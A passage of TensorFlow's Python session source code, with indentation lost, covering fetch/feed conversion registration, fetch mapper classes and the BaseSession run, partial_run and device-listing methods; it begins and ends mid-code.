], _get_indexed_slices_value_from_fetches),
_get_feeds_for_indexed_slices,
lambda feed: [feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape]),
# The default catches all other types and performs no expansions.
(object, lambda fetch: ([fetch], lambda fetched_vals: fetched_vals[0]),
lambda feed, feed_val: [(feed, feed_val)], lambda feed: [feed])
]
# pylint: enable=g-long-lambda
def _convert_to_numpy_obj(numpy_dtype, obj):
"""Explicitly convert obj based on numpy type except for string type."""
return numpy_dtype(obj) if numpy_dtype is not object else str(obj)
def register_session_run_conversion_functions(
tensor_type,
fetch_function,
feed_function=None,
feed_function_for_partial_run=None):
"""Register fetch and feed conversion functions for `tf.Session.run()`.
This function registers a triple of conversion functions for fetching and/or
feeding values of user-defined types in a call to tf.Session.run().
An example
```python
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = tf.square(tensor)
#you can define conversion functions as follows:
fetch_function = lambda squared_tensor:([squared_tensor.sq],
lambda val: val[0])
feed_function = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_function_for_partial_run = lambda feed: [feed.sq]
#then after invoking this register function, you can use as follows:
session.run(squared_tensor1,
feed_dict = {squared_tensor2 : some_numpy_array})
```
Args:
tensor_type: The type for which you want to register a conversion function.
fetch_function: A callable that takes an object of type `tensor_type` and
returns a tuple, where the first element is a list of `tf.Tensor` objects,
and the second element is a callable that takes a list of ndarrays and
returns an object of some value type that corresponds to `tensor_type`.
fetch_function describes how to expand fetch into its component Tensors
and how to contract the fetched results back into a single return value.
feed_function: A callable that takes feed_key and feed_value as input, and
returns a list of tuples (feed_tensor, feed_val), feed_key must have type
`tensor_type`, and feed_tensor must have type `tf.Tensor`. Each feed
function describes how to unpack a single fed value and map it to feeds of
one or more tensors and their corresponding values.
feed_function_for_partial_run: A callable for specifying tensor values to
feed when setting up a partial run, which takes a `tensor_type` type
object as input, and returns a list of Tensors.
Raises:
ValueError: If `tensor_type` has already been registered.
"""
for conversion_function in _REGISTERED_EXPANSIONS:
if issubclass(conversion_function[0], tensor_type):
raise ValueError('%s has already been registered so ignore it.' %
tensor_type)
_REGISTERED_EXPANSIONS.insert(0, (tensor_type, fetch_function, feed_function,
feed_function_for_partial_run))
def _is_attrs_instance(obj):
"""Returns True if the given obj is an instance of attrs-decorated class."""
return getattr(obj.__class__, '__attrs_attrs__', None) is not None
def _get_attrs_values(obj):
"""Returns the list of values from an attrs instance."""
attrs = getattr(obj.__class__, '__attrs_attrs__')
return [getattr(obj, a.name) for a in attrs]
class _FetchMapper(object):
"""Definition of the interface provided by fetch mappers.
Fetch mappers are utility classes used by the _FetchHandler to handle
arbitrary structures for the `fetch` argument to `Session.run()`.
The `fetch` argument can be of various shapes: single tensor or op, list of
fetches, tuple of fetches, namedtuple of fetches, or dict of fetches. The
structures can be arbitrarily nested.
The low level run() API only wants a list of tensor or op names. The various
`_FetchMapper` subclasses below take care of handling the different shapes:
uniquifying the fetches, and constructing results with the original shape.
"""
def unique_fetches(self):
"""Return the list of unique tensors or ops needed by this fetch mapper.
Returns:
A list of tensors or ops.
"""
raise NotImplementedError('Must be implemented by subclasses')
def build_results(self, values):
"""Build results that match the original shape of the fetch.
Args:
values: List of values returned by run(). The values correspond exactly to
the list tensors or ops returned by unique_fetches().
Returns:
A struct of the same shape as the original fetch object handled by
this fetch mapper. In the returned struct, the original fetches are
replaced by their fetched values.
"""
raise NotImplementedError('Must be implemented by subclasses')
@staticmethod
def for_fetch(fetch):
"""Creates fetch mapper that handles the structure of `fetch`.
The default graph must be the one from which we want to fetch values when
this function is called.
Args:
fetch: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
Returns:
An instance of a subclass of `_FetchMapper` that handles the shape.
"""
if fetch is None:
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
elif isinstance(fetch, (list, tuple)):
# NOTE(touts): This is also the code path for namedtuples.
return _ListFetchMapper(fetch)
elif isinstance(fetch, collections_abc.Mapping):
return _DictFetchMapper(fetch)
elif _is_attrs_instance(fetch):
return _AttrsFetchMapper(fetch)
else:
# Look for a handler in the registered expansions.
for tensor_type, fetch_fn, _, _ in _REGISTERED_EXPANSIONS:
if isinstance(fetch, tensor_type):
fetches, contraction_fn = fetch_fn(fetch)
return _ElementFetchMapper(fetches, contraction_fn)
# Did not find anything.
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
class _ElementFetchMapper(_FetchMapper):
"""Fetch mapper for singleton tensors and ops."""
def __init__(self, fetches, contraction_fn):
"""Creates an _ElementFetchMapper.
This is the fetch mapper used for leaves in the fetch struct. Because of
the expansions mechanism, a leaf can actually fetch more than one tensor.
Also note that the fetches here can be just strings (tensor or op names) or
any other object that the graph knows how to convert to a tensor, such as a
Variable. So we have to run each fetch through `as_graph_element()` to get
the corresponding tensor or op.
Args:
fetches: List of objects, as returned by a fetch_fn defined in
_REGISTERED_EXPANSIONS.
contraction_fn: Callable as returned by a fetch_fn.
"""
self._unique_fetches = []
for fetch in fetches:
try:
self._unique_fetches.append(ops.get_default_graph().as_graph_element(
fetch, allow_tensor=True, allow_operation=True))
except TypeError as e:
raise TypeError('Fetch argument %r has invalid type %r, '
'must be a string or Tensor. (%s)' %
(fetch, type(fetch), str(e)))
except ValueError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
except KeyError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
self._contraction_fn = contraction_fn
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
if not values:
# 'Operation' case
return None
else:
return self._contraction_fn(values)
def _uniquify_fetches(fetch_mappers):
"""Uniquifies fetches from a list of fetch_mappers.
This is a utility function used by _ListFetchMapper and _DictFetchMapper. It
gathers all the unique fetches from a list of mappers and builds a list
containing all of them but without duplicates (unique_fetches).
It also returns a 2-D list of integers (values_indices) indicating at which
index in unique_fetches the fetches of the mappers are located.
This list is as follows:
values_indices[mapper_index][mapper_fetch_index] = unique_fetches_index
Args:
fetch_mappers: list of fetch mappers.
Returns:
A list of fetches.
A 2-D list of integers.
"""
unique_fetches = []
value_indices = []
seen_fetches = {}
for m in fetch_mappers:
m_value_indices = []
for f in m.unique_fetches():
j = seen_fetches.get(f)
if j is None:
j = len(seen_fetches)
seen_fetches[f] = j
unique_fetches.append(f)
m_value_indices.append(j)
value_indices.append(m_value_indices)
return unique_fetches, value_indices
class _ListFetchMapper(_FetchMapper):
"""Fetch mapper for lists, tuples, and namedtuples."""
def __init__(self, fetches):
"""Creates a _ListFetchMapper.
Args:
fetches: List, tuple, or namedtuple of fetches.
"""
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in fetches]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
# Create the list of results for each mapper.
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
# Return a value of the original type of the fetches.
if issubclass(self._fetch_type, list):
return results
elif self._fetch_type == tuple:
return tuple(results)
else:
# This is the code path for namedtuple.
return self._fetch_type(*results)
class _DictFetchMapper(_FetchMapper):
"""Fetch mapper for dicts."""
def __init__(self, fetches):
"""Creates a _DictFetchMapper.
Args:
fetches: Dict of fetches.
"""
self._fetch_type = type(fetches)
self._keys = fetches.keys()
self._mappers = [
_FetchMapper.for_fetch(fetch) for fetch in fetches.values()
]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
results = self._fetch_type()
for k, m, vi in zip(self._keys, self._mappers, self._value_indices):
results[k] = m.build_results([values[j] for j in vi])
return results
class _AttrsFetchMapper(_FetchMapper):
"""Fetch mapper for attrs decorated classes."""
def __init__(self, fetches):
"""Creates a _AttrsFetchMapper.
Args:
fetches: An instance of an attrs decorated class.
"""
values = _get_attrs_values(fetches)
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in values]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
return self._fetch_type(*results)
class _FetchHandler(object):
"""Handler for structured fetches.
Given a graph, a user-provided structure for fetches, and a feed dict, this
class takes care of generating a list of tensor names to fetch and op names
to run for a low level `run()` call.
Given the results of the low level run call, this class can also rebuild a
result structure matching the user-provided structure for fetches, but
containing the corresponding results.
"""
# TODO(touts): Make this class also take care of destructuring the feed
# dict instead of doing it in the callers.
def __init__(self, graph, fetches, feeds, feed_handles=None):
"""Creates a fetch handler.
Args:
graph: Graph of the fetches. Used to check for fetchability and to
convert all fetches to tensors or ops as needed.
fetches: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
feeds: A feed dict where keys are Tensors.
feed_handles: A dict from feed Tensors to TensorHandle objects used as
direct feeds.
"""
with graph.as_default():
self._fetch_mapper = _FetchMapper.for_fetch(fetches)
self._fetches = []
self._targets = []
self._feeds = feeds
self._feed_handles = feed_handles or {}
self._ops = []
self._fetch_handles = {}
for fetch in self._fetch_mapper.unique_fetches():
if isinstance(fetch, ops.Operation):
self._assert_fetchable(graph, fetch)
self._targets.append(fetch)
self._ops.append(True)
else:
self._assert_fetchable(graph, fetch.op)
self._fetches.append(fetch)
self._ops.append(False)
# Remember the fetch if it is for a tensor handle.
if (isinstance(fetch, ops.Tensor) and
(fetch.op.type == 'GetSessionHandle' or
fetch.op.type == 'GetSessionHandleV2')):
self._fetch_handles[fetch] = fetch.op.inputs[0].dtype
self._final_fetches = [x for x in self._fetches if x not in feeds]
def _assert_fetchable(self, graph, op):
if not graph.is_fetchable(op):
raise errors.InaccessibleTensorError(
'Operation %r has been marked as not fetchable. Typically this'
' happens when it is defined in another function or code block.'
' Use return values,explicit Python locals or TensorFlow collections'
' to access it.'
% op.name)
def fetches(self):
"""Return the unique names of tensors to fetch.
Returns:
A list of strings.
"""
return self._final_fetches
def targets(self):
"""Return the unique names of ops to run.
Returns:
A list of strings.
"""
return self._targets
def build_results(self, session, tensor_values):
"""Build results matching the original fetch shape.
`tensor_values` must be a list of the same length as
the one returned by `fetches()`, and holding the requested
fetch values.
This method builds a struct with the same shape as the original `fetches`
passed to the constructor, in which the fetches are replaced by their
fetched value.
Args:
session: The enclosing session. Used for tensor handles.
tensor_values: List of values matching the list returned by fetches().
Returns:
A structure of the same shape as the original `fetches` argument but
containing tensors or None (for fetched ops).
"""
full_values = []
assert len(self._final_fetches) == len(tensor_values)
i = 0
j = 0
for is_op in self._ops:
if is_op:
full_values.append(None)
else:
# If the fetch was in the feeds, use the fed value, otherwise
# use the returned value.
if self._fetches[i] in self._feed_handles:
# A fetch had a corresponding direct TensorHandle feed. Call eval()
# to obtain the Tensor value from the TensorHandle.
value = self._feed_handles[self._fetches[i]].eval()
else:
value = self._feeds.get(self._fetches[i])
if value is None:
value = tensor_values[j]
j += 1
dtype = self._fetch_handles.get(self._fetches[i])
if dtype:
full_values.append(session_ops.TensorHandle(value, dtype, session))
else:
full_values.append(value)
i += 1
assert j == len(tensor_values)
return self._fetch_mapper.build_results(full_values)
def _name_list(tensor_list):
"""Utility function for transitioning to the new session API.
Args:
tensor_list: a list of `Tensor`s.
Returns:
A list of each `Tensor`s name (as byte arrays).
"""
return [compat.as_bytes(t.name) for t in tensor_list]
class _DeviceAttributes(object):
"""Struct-like object describing a device's attributes.
Each device has 3 key properties:
- name: the fully-qualified TensorFlow path to the device. For
example: /job:worker/replica:0/task:3/device:CPU:0
- device_type: the type of the device (e.g. CPU, GPU, TPU, etc.)
- memory_limit_bytes: the maximum amount of memory available on the device
(in bytes).
"""
def __init__(self, name, device_type, memory_limit_bytes, incarnation):
self._name = device.canonical_name(name)
self._device_type = device_type
self._memory_limit_bytes = memory_limit_bytes
self._incarnation = incarnation
@property
def name(self):
return self._name
@property
def device_type(self):
return self._device_type
@property
def memory_limit_bytes(self):
return self._memory_limit_bytes
@property
def incarnation(self):
return self._incarnation
def __repr__(self):
return '_DeviceAttributes(%s, %s, %d, %d)' % (
self.name,
self.device_type,
self.memory_limit_bytes,
self.incarnation,
)
class BaseSession(SessionInterface):
"""A class for interacting with a TensorFlow computation.
The BaseSession enables incremental graph building with inline
execution of Operations and evaluation of Tensors.
"""
def __init__(self, target='', graph=None, config=None):
"""Constructs a new TensorFlow session.
Args:
target: (Optional) The TensorFlow execution engine to connect to.
graph: (Optional) The graph to be used. If this argument is None, the
default graph will be used.
config: (Optional) ConfigProto proto used to configure the session. If no
config is specified, the global default will be used. The global default
can be configured via the tf.config APIs.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
creating the TensorFlow session.
TypeError: If one of the arguments has the wrong type.
"""
if graph is None:
self._graph = ops.get_default_graph()
else:
if not isinstance(graph, ops.Graph):
raise TypeError('graph must be a tf.Graph, but got %s' % type(graph))
self._graph = graph
self._closed = False
if target is not None:
try:
self._target = compat.as_bytes(target)
except TypeError:
if isinstance(target, config_pb2.ConfigProto):
raise TypeError('target must be a string, but got %s.'
' Did you do "Session(config)" instead of'
' "Session(config=config)"?' % type(target))
raise TypeError('target must be a string, but got %s' % type(target))
else:
self._target = None
self._delete_lock = threading.Lock()
self._dead_handles = []
if config is None:
config = context.context().config
if not isinstance(config, config_pb2.ConfigProto):
raise TypeError('config must be a tf.ConfigProto, but got %s' %
type(config))
if (mixed_precision_global_state.mixed_precision_graph_rewrite_is_enabled
and config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.OFF):
new_config = config_pb2.ConfigProto()
new_config.CopyFrom(config)
new_config.graph_options.rewrite_options.auto_mixed_precision = (
rewriter_config_pb2.RewriterConfig.ON)
config = new_config
elif (config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.ON):
mixed_precision_global_state.non_mixed_precision_session_created = True
self._config = config
self._add_shapes = config.graph_options.infer_shapes
self._session = None
opts = tf_session.TF_NewSessionOptions(target=self._target, config=config)
try:
# pylint: disable=protected-access
self._session = tf_session.TF_NewSessionRef(self._graph._c_graph, opts)
# pylint: enable=protected-access
finally:
tf_session.TF_DeleteSessionOptions(opts)
def list_devices(self):
"""Lists available devices in this session.
```python
devices = sess.list_devices()
for d in devices:
print(d.name)
```
Where:
Each element in the list has the following properties
name: A string with the full name of the device. ex:
`/job:worker/replica:0/task:3/device:CPU:0`
device_type: The type of the device (e.g. `CPU`, `GPU`, `TPU`.)
memory_limit: The maximum amount of memory available on the device.
Note: depending on the device, it is possible the usable memory could
be substantially less.
Raises:
tf.errors.OpError: If it encounters an error (e.g. session is in an
invalid state, or network errors occur).
Returns:
A list of devices in the session.
"""
raw_device_list = tf_session.TF_SessionListDevices(self._session)
device_list = []
size = tf_session.TF_DeviceListCount(raw_device_list)
for i in range(size):
name = tf_session.TF_DeviceListName(raw_device_list, i)
device_type = tf_session.TF_DeviceListType(raw_device_list, i)
memory = tf_session.TF_DeviceListMemoryBytes(raw_device_list, i)
incarnation = tf_session.TF_DeviceListIncarnation(raw_device_list, i)
device_list.append(
_DeviceAttributes(name, device_type, memory, incarnation))
tf_session.TF_DeleteDeviceList(raw_device_list)
return device_list
def close(self):
"""Closes this session.
Calling this method frees all resources associated with the session.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
closing the TensorFlow session.
"""
if self._session and not self._closed:
self._closed = True
tf_session.TF_CloseSession(self._session)
def __del__(self):
# cleanly ignore all exceptions
try:
self.close()
except Exception: # pylint: disable=broad-except
pass
if self._session is not None:
try:
tf_session.TF_DeleteSession(self._session)
except (AttributeError, TypeError):
# At shutdown, `c_api_util`, `tf_session`, or
# `tf_session.TF_DeleteSession` may have been garbage collected, causing
# the above method calls to fail. In this case, silently leak since the
# program is about to terminate anyway.
pass
self._session = None
@property
def graph(self):
"""The graph that was launched in this session."""
return self._graph
@property
def graph_def(self):
"""A serializable version of the underlying TensorFlow graph.
Returns:
A graph_pb2.GraphDef proto containing nodes for all of the Operations in
the underlying TensorFlow graph.
"""
return self._graph.as_graph_def(add_shapes=self._add_shapes)
@property
def sess_str(self):
return self._target
def as_default(self):
"""Returns a context manager that makes this object the default session.
Use with the `with` keyword to specify that calls to
`tf.Operation.run` or `tf.Tensor.eval` should be executed in
this session.
```python
c = tf.constant(..)
sess = tf.compat.v1.Session()
with sess.as_default():
assert tf.compat.v1.get_default_session() is sess
print(c.eval())
```
To get the current default session, use `tf.compat.v1.get_default_session`.
*N.B.* The `as_default` context manager *does not* close the
session when you exit the context, and you must close the session
explicitly.
```python
c = tf.constant(...)
sess = tf.compat.v1.Session()
with sess.as_default():
print(c.eval())
# ...
with sess.as_default():
print(c.eval())
sess.close()
```
Alternatively, you can use `with tf.compat.v1.Session():` to create a
session that is automatically closed on exiting the context,
including when an uncaught exception is raised.
*N.B.* The default session is a property of the current thread. If you
create a new thread, and wish to use the default session in that
thread, you must explicitly add a `with sess.as_default():` in that
thread's function.
*N.B.* Entering a `with sess.as_default():` block does not affect
the current default graph. If you are using multiple graphs, and
`sess.graph` is different from the value of
`tf.compat.v1.get_default_graph`, you must explicitly enter a
`with sess.graph.as_default():` block to make `sess.graph` the default
graph.
Returns:
A context manager using this session as the default session.
"""
return ops.default_session(self)
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations and evaluates tensors in `fetches`.
This method runs one "step" of TensorFlow computation, by
running the necessary graph fragment to execute every `Operation`
and evaluate every `Tensor` in `fetches`, substituting the values in
`feed_dict` for the corresponding input values.
The `fetches` argument may be a single graph element, or an arbitrarily
nested list, tuple, namedtuple, dict, or OrderedDict containing graph
elements at its leaves. A graph element can be one of the following types:
* A `tf.Operation`.
The corresponding fetched value will be `None`.
* A `tf.Tensor`.
The corresponding fetched value will be a numpy ndarray containing the
value of that tensor.
* A `tf.SparseTensor`.
The corresponding fetched value will be a
`tf.compat.v1.SparseTensorValue`
containing the value of that sparse tensor.
* A `get_tensor_handle` op. The corresponding fetched value will be a
numpy ndarray containing the handle of that tensor.
* A `string` which is the name of a tensor or operation in the graph.
The value returned by `run()` has the same shape as the `fetches` argument,
where the leaves are replaced by the corresponding values returned by
TensorFlow.
Example:
```python
a = tf.constant([10, 20])
b = tf.constant([1.0, 2.0])
# 'fetches' can be a singleton
v = session.run(a)
# v is the numpy array [10, 20]
# 'fetches' can be a list.
v = session.run([a, b])
# v is a Python list with 2 numpy arrays: the 1-D array [10, 20] and the
# 1-D array [1.0, 2.0]
# 'fetches' can be arbitrary lists, tuples, namedtuple, dicts:
MyData = collections.namedtuple('MyData', ['a', 'b'])
v = session.run({'k1': MyData(a, b), 'k2': [b, a]})
# v is a dict with
# v['k1'] is a MyData namedtuple with 'a' (the numpy array [10, 20]) and
# 'b' (the numpy array [1.0, 2.0])
# v['k2'] is a list with the numpy array [1.0, 2.0] and the numpy array
# [10, 20].
```
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. Each key in `feed_dict` can be
one of the following types:
* If the key is a `tf.Tensor`, the
value may be a Python scalar, string, list, or numpy ndarray
that can be converted to the same `dtype` as that
tensor. Additionally, if the key is a
`tf.compat.v1.placeholder`, the shape of
the value will be checked for compatibility with the placeholder.
* If the key is a
`tf.SparseTensor`,
the value should be a
`tf.compat.v1.SparseTensorValue`.
* If the key is a nested tuple of `Tensor`s or `SparseTensor`s, the value
should be a nested tuple with the same structure that maps to their
corresponding values as above.
Each value in `feed_dict` must be convertible to a numpy array of the dtype
of the corresponding key.
The optional `options` argument expects a [`RunOptions`] proto. The options
allow controlling the behavior of this particular step (e.g. turning tracing
on).
The optional `run_metadata` argument expects a [`RunMetadata`] proto. When
appropriate, the non-Tensor output of this step will be collected there. For
example, when users turn on tracing in `options`, the profiled info will be
collected into this argument and passed back.
Args:
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (described
above).
feed_dict: A dictionary that maps graph elements to values (described
above).
options: A [`RunOptions`] protocol buffer
run_metadata: A [`RunMetadata`] protocol buffer
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary (described above).
Order in which `fetches` operations are evaluated inside the call
is undefined.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
ValueError: If `fetches` or `feed_dict` keys are invalid or refer to a
`Tensor` that doesn't exist.
"""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
result = self._run(None, fetches, feed_dict, options_ptr,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return result
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with more feeds and fetches.
This is EXPERIMENTAL and subject to change.
To use partial execution, a user first calls `partial_run_setup()` and
then a sequence of `partial_run()`. `partial_run_setup` specifies the
list of feeds and fetches that will be used in the subsequent
`partial_run` calls.
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. See run() for more information.
Below is a simple example:
```python
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.multiply(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
res = sess.partial_run(h, r2, feed_dict={c: res})
```
Args:
handle: A handle for a sequence of partial runs.
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (see
documentation for `run`).
feed_dict: A dictionary that maps graph elements to values (described
above).
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary
(see documentation for `run`).
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# TODO(touts): Support feeding and fetching the same tensor.
return self._run(handle, fetches, feed_dict, None, None)
def partial_run_setup(self, fetches, feeds=None):
"""Sets up a graph with feeds and fetches for partial run.
This is EXPERIMENTAL and subject to change.
Note that contrary to `run`, `feeds` only specifies the graph elements.
The tensors will be supplied by the subsequent `partial_run` calls.
Args:
fetches: A single graph element, or a list of graph elements.
feeds: A single graph element, or a list of graph elements.
Returns:
A handle for partial run.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
tf.errors.OpError: Or one of its subclasses if a TensorFlow error happens.
"""
def _feed_fn(feed):
for tensor_type, _, _, feed_fn in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
if feeds is None:
feeds = []
# Create request.
feed_list = []
# Validate and process feed_list.
is_list_feed = isinstance(feeds, (list, tuple))
if not is_list_feed:
feeds = [feeds]
for feed in feeds:
for subfeed in _feed_fn(feed):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
# pylint: disable=protected-access
feed_list.append(subfeed_t._as_tf_output())
# pylint: enable=protected-access
except Exception as e:
e.message = ('Cannot interpret feed_list key as Tensor: ' + e.message)
e.args = (e.message,)
raise e
# Validate and process fetches.
# TODO(touts): Support feeding and fetching the same tensor.
fetch_handler = _FetchHandler(self._graph, fetches, {})
# Set up a graph with feeds and fetches for partial run.
def _setup_fn(session, feed_list, fetch_list, target_list):
self._extend_graph()
return tf_session.TF_SessionPRunSetup_wrapper(session, feed_list,
fetch_list, target_list)
# pylint: disable=protected-access
final_fetches = [t._as_tf_output() for t in fetch_handler.fetches()]
final_targets = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
return self._do_call(_setup_fn, self._session, feed_list, final_fetches,
final_targets)
def _run(self, handle, fetches, feed_dict, options, run_metadata):
"""Perform either run or partial_run, depending the presence of `handle`."""
def _feed_fn(feed, feed_val):
for tensor_type, _, feed_fn, _ in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed, feed_val)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
# Create request.
feed_dict_tensor = {}
feed_map = {}
# Validate and process feed_dict.
feed_handles = {}
if feed_dict:
feed_dict = nest.flatten_dict_items(feed_dict)
for feed, feed_val in feed_dict.items():
for subfeed, subfeed_val in _feed_fn(feed, feed_val):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
except Exception as e:
raise TypeError('Cannot interpret feed_dict key as Tensor: ' +
e.args[0])
if isinstance(subfeed_val, ops.Tensor):
raise TypeError('The value of a feed cannot be a tf.Tensor object. '
'Acceptable feed values include Python scalars, '
'strings, lists, numpy ndarrays, or TensorHandles. '
'For reference, the tensor object was ' +
str(feed_val) + ' which was passed to the '
'feed with key ' + str(feed) + '.')
subfeed_dtype = subfeed_t.dtype.as_numpy_dtype
if isinstance(subfeed_val, int) and _convert_to_numpy_obj(
subfeed_dtype, subfeed_val) != subfeed_val:
raise TypeError(
'Type of feed value ' + str(subfeed_val) + ' with type ' +
str(type(subfeed_val)) +
' is not compatible with Tensor type ' + str(subfeed_dtype) +
'. Try explicitly setting the type of the feed tensor'
' to a larger type (e.g. int64).')
is_tensor_handle_feed = isinstance(subfeed_val,
session_ops.TensorHandle)
if is_tensor_handle_feed:
np_val = subfeed_val.to_numpy_array()
feed_handles[subfeed_t] = subfeed_val
else:
np_val = np.asarray(subfeed_val, dtype=subfeed_dtype)
if (not is_tensor_handle_feed and
not subfeed_t.get_shape().is_compatible_with(np_val.shape)):
raise ValueError(
'Cannot feed value of shape %r for Tensor %r, '
'which has shape %r' %
(np_val.shape, subfeed_t.name, str(subfeed_t.get_shape())))
if not self.graph.is_feedable(subfeed_t):
raise ValueError('Tensor %s may not be fed.' % subfeed_t)
feed_dict_tensor[subfeed_t] = np_val
feed_map[compat.as_bytes(subfeed_t.name)] = (subfeed_t, subfeed_val)
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(
self._graph, fetches, feed_dict_tensor, feed_handles=feed_handles)
# Run request and get response.
# We need to keep the returned movers alive for the following _do_run().
# These movers are no longer needed when _do_run() completes, and
# are deleted when `movers` goes out of scope when this _run() ends.
# TODO(yuanbyu, keveman): Revisit whether we should just treat feeding
# of a handle from a different device as an error.
_ = self._update_with_movers(feed_dict_tensor, feed_map)
final_fetches = fetch_handler.fetches()
final_targets = fetch_handler.targets()
# We only want to really perform the run if fetches or targets are provided,
# or if the call is a partial run that specifies feeds.
if final_fetches or final_targets or (handle and feed_dict_tensor):
results = self._do_run(handle, final_targets, final_fetches,
feed_dict_tensor, options, run_metadata)
else:
results = []
return fetch_handler.build_results(self, results)
def make_callable(self, fetches, feed_list=None, accept_options=False):
"""Returns a Python callable that runs a particular step.
The returned callable will take `len(feed_list)` arguments whose types
must be compatible feed values for the respective elements of `feed_list`.
For example, if element `i` of `feed_list` is a `tf.Tensor`, the `i`th
argument to the returned callable must be a numpy ndarray (or something
convertible to an ndarray) with matching element type and shape. See
`tf.Session.run` for details of the allowable feed key and value types.
The returned callable will have the same return type as
`tf.Session.run(fetches, ...)`. For example, if `fetches` is a `tf.Tensor`,
the callable will return a numpy ndarray; if `fetches` is a `tf.Operation`,
it will return `None`.
Args:
fetches: A value or list of values to fetch. See `tf.Session.run` for
details of the allowable fetch types.
feed_list: (Optional.) A list of `feed_dict` keys. See `tf.Session.run`
for details of the allowable feed key types.
accept_options: (Optional.) If `True`, the returned `Callable` will be
able to accept `tf.compat.v1.RunOptions` and `tf.compat.v1.RunMetadata`
as optional keyword arguments `options` and `run_metadata`,
respectively, with the same syntax and semantics as `tf.Session.run`,
which is useful for certain use cases (profiling and debugging) but will
result in measurable slowdown of the `Callable`'s
performance. Default: `False`.
Returns:
A function that when called will execute the step defined by
`feed_list` and `fetches` in this session.
Raises:
TypeError: If `fetches` or `feed_list` cannot be interpreted
as arguments to `tf.Session.run`.
"""
if feed_list is not None:
if not isinstance(feed_list, (list, tuple)):
raise TypeError('`feed_list` must be a list or tuple.')
# Delegate any non-empty feed lists to the existing `run()` logic.
# TODO(mrry): Refactor the feed handling logic from
# `Session._run()` so that we can convert the feeds to a list of
# strings here.
def _generic_run(*feed_args, **kwargs):
feed_dict = {
feed: feed_val for feed, feed_val in zip(feed_list, feed_args)
}
return self.run(fetches, feed_dict=feed_dict, **kwargs)
return _generic_run
# Ensure any changes to the graph are reflected in the runtime.
# Note that we don't need to do this on subsequent calls to the
# returned object, because the arguments to `fetches` must already be
# in the graph.
self._extend_graph()
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(self._graph, fetches, {})
# pylint: disable=protected-access
fetch_list = [t._as_tf_output() for t in fetch_handler.fetches()]
target_list = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
def _callable_template_with_options_and_metadata(fetch_list,
target_list,
